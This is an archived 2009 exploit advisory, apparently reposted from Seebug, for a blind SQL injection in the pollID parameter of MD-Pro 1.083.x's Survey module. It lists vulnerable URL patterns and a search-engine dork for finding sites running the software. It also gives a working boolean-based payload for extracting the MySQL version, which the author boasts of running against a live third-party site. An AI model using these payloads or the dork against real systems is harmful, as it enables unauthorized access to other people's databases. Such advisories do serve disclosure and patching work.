MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability

2009-06-25T00:00:00
ID SSV:14921
Type seebug
Reporter Root
Modified 2009-06-25T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [!]Information_schema:

[Product:  MDPro v 1.083.x               ]
[site:     www.maxdev.com                ]
[Vuln:     Blind $QL Injection (pollID)  ]
[Author:   XaDoS ~ thanks to S3rg3770    ]
[dork:     inurl:modules.php?op= "pollID"]
[          "Powered By MDPro"            ]

[~] Vuln:  (PollID)

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
or
http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]

[~] DeMo:

For example, if yuo want see the version of MySql write:

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#

Like:

http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
so v => 5.0.0    (this site have 96 databases) :)

[~] Note:

If yuo want exploit for this vuln write it by yuorself. I'm really Busy.

thanks to s3rg3770 and warwolfz Crew


\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire

Have Fun :D

# sebug.net